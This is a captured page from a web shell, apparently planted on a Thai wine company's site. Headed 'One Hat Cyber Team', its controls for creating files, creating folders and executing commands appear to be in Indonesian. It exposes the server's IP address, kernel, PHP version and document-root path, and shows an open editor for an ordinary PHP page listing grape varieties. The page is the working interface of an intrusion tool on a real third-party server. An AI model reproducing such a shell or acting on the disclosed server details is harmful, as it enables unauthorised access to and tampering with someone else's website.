One Hat Cyber Team
Your IP :
216.73.216.152
Server IP :
27.254.111.200
Server :
Linux wh-sh59.csloxinfo.com 3.10.0-693.5.2.el7.x86_64 #1 SMP Fri Oct 20 20:32:50 UTC 2017 x86_64
Server Software :
Apache
PHP Version :
5.5.38
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
var
/
www
/
vhosts
/
oakwine.co.th
/
httpdocs
/
view
/
Grape
/
Edit File:
list.php
<?php SYS::DOMAIN("Grape"); SYS::CONTROLLER("grapeController"); SYS::ADDFUNCTION("display"); $grapeInstanceList = new Grape(); $perPage = 10; $p = isset($_GET["p"]) ? $_GET["p"] : 1 ; $pageStart = ($p-1)*$perPage; ?> <div class="row"><div class="col-lg-12"> <div class="box box-info"> <div class="box-header with-border"> <h3 class="box-title">รายการข้อมูล พันธุ์องุ่น</h3> <div class="btn-group"> <a href="?page=Grape/create" class="btn bg-olive"><i class="fa fa-plus-circle"></i> เพิ่มข้อมูล พันธุ์องุ่น</a> </div> </div> <div class="table-responsive"> <table class="table table-striped"> <thead> <tr> <th>#</th> <th>ID</th> <th>พันธุ์องุ่น</th> </tr> </thead> <tbody> <?php foreach($grapeInstanceList->listBy(array("limit"=>"$pageStart,$perPage", "order"=>"name")) as $grapeInstance){ ?> <tr> <td style="width:5%;"> <?php echo ($pageStart++) +1; ?> </td> <td style="width:5%;"> <a href="?page=Grape/show&id=<?php echo $grapeInstance->id; ?>"><?php echo $grapeInstance->id; ?></a> </td> <td> <a href="?page=Grape/show&id=<?php echo $grapeInstance->id; ?>"><?php echo $grapeInstance->toString(); ?></a> </td> </tr> <?php } ?> </tbody> </table> </div> <div class="col-lg-12"> <?php $params = array("page"=>"Grape/list"); echo paginate2($grapeInstanceList->count(),$perPage,$params); ?> </div> </div> </div></div>
Simpan